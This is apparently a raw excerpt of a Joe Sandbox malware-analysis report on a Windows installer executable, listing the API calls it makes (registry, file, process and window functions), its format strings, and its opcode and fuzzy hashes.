• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                        • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                        • Opcode ID: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                        • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d135351413aed0fa2e41fb55b591d9c8f09a23be57b10ac43573759c3ccf12cb
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                        • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                        • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                        • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                        • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                        • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                        • Opcode ID: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                        • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ef21115088bf02e153ee67726e536285437d58c513b54df1b4c7782176e81a7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
• FreeLibrary.KERNEL32(?,?), ref: 004024C3
Strings
• Error registering DLL: %s not found in %s, xrefs: 0040249A
• Error registering DLL: Could not initialize OLE, xrefs: 004024F1
• Error registering DLL: Could not load %s, xrefs: 004024DB
• `G, xrefs: 0040246E
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_din.jbxd
Similarity
• API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
• String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
• API String ID: 1033533793-4193110038
• Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
• Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
• Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
• Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00403E10
• GetSysColor.USER32(00000000), ref: 00403E2C
• SetTextColor.GDI32(?,00000000), ref: 00403E38
• SetBkMode.GDI32(?,?), ref: 00403E44
• GetSysColor.USER32(?), ref: 00403E57
• SetBkColor.GDI32(?,?), ref: 00403E67
• DeleteObject.GDI32(?), ref: 00403E81
• CreateBrushIndirect.GDI32(?), ref: 00403E8B
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_din.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
• Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
• Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
• Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
APIs
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042795A,771B23A0,00000000), ref: 00404FD6
  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FE6
  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042795A,771B23A0,00000000), ref: 00404FF9
  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
  • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
  • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
• GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
• CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
Strings
• Exec: failed createprocess ("%s"), xrefs: 004022C2
• Exec: command="%s", xrefs: 00402241
• Exec: success ("%s"), xrefs: 00402263
Memory Dump Source
• Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_din.jbxd
Similarity
• API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
• String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
• API String ID: 2014279497-3433828417
• Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
• Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
• Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
• Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
APIs
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                                                                                                                                                                                                                        • GetMessagePos.USER32 ref: 0040489D
                                                                                                                                                                                                                                                                                        • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                                                                        • String ID: f
                                                                                                                                                                                                                                                                                        • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                                                                        • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                        • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                                                                                                                                                                                                                        • MulDiv.KERNEL32(00065A00,00000064,0012AF1F), ref: 00403295
                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                                                                                                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                                                                        • String ID: verifying installer: %d%%
                                                                                                                                                                                                                                                                                        • API String ID: 1451636040-82062127
                                                                                                                                                                                                                                                                                        • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                        • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                        • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                        • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Char$Next$Prev
                                                                                                                                                                                                                                                                                        • String ID: *?|<>/":
                                                                                                                                                                                                                                                                                        • API String ID: 589700163-165019052
                                                                                                                                                                                                                                                                                        • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                        • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                        • String ID: !
                                                                                                                                                                                                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                        • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                        • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                        • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                        • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247961266.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_din.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                        • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                        • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                        • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                        • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                          • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                          • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1247836232.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247813283.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247862165.0000000000409000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1247883721.000000000046B000.00000004.00000001.01000000.00000003.sdmp
